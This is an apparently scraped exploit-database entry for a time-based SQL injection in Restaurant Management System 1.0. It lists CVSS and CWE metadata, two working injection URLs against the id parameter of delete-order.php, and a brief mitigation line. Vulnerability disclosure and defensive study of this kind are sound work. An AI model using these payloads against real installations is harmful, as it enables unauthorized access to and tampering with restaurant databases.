vendor:
Restaurant Management System
by:
calfcrusher
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Restaurant Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: Unknown
Related CWE: Unknown
CPE: a:sourcecodester:restaurant_management_system:1.0
Platforms Tested: Apache 2.4.6, PHP 5.4.16
2023
Exploit Title: Restaurant Management System 1.0 – SQL Injection
Time Base SQL Injection payloads: http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23 and http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)--+
Mitigation:
Input validation, parameterized queries, and stored procedures can help mitigate SQL injection attacks.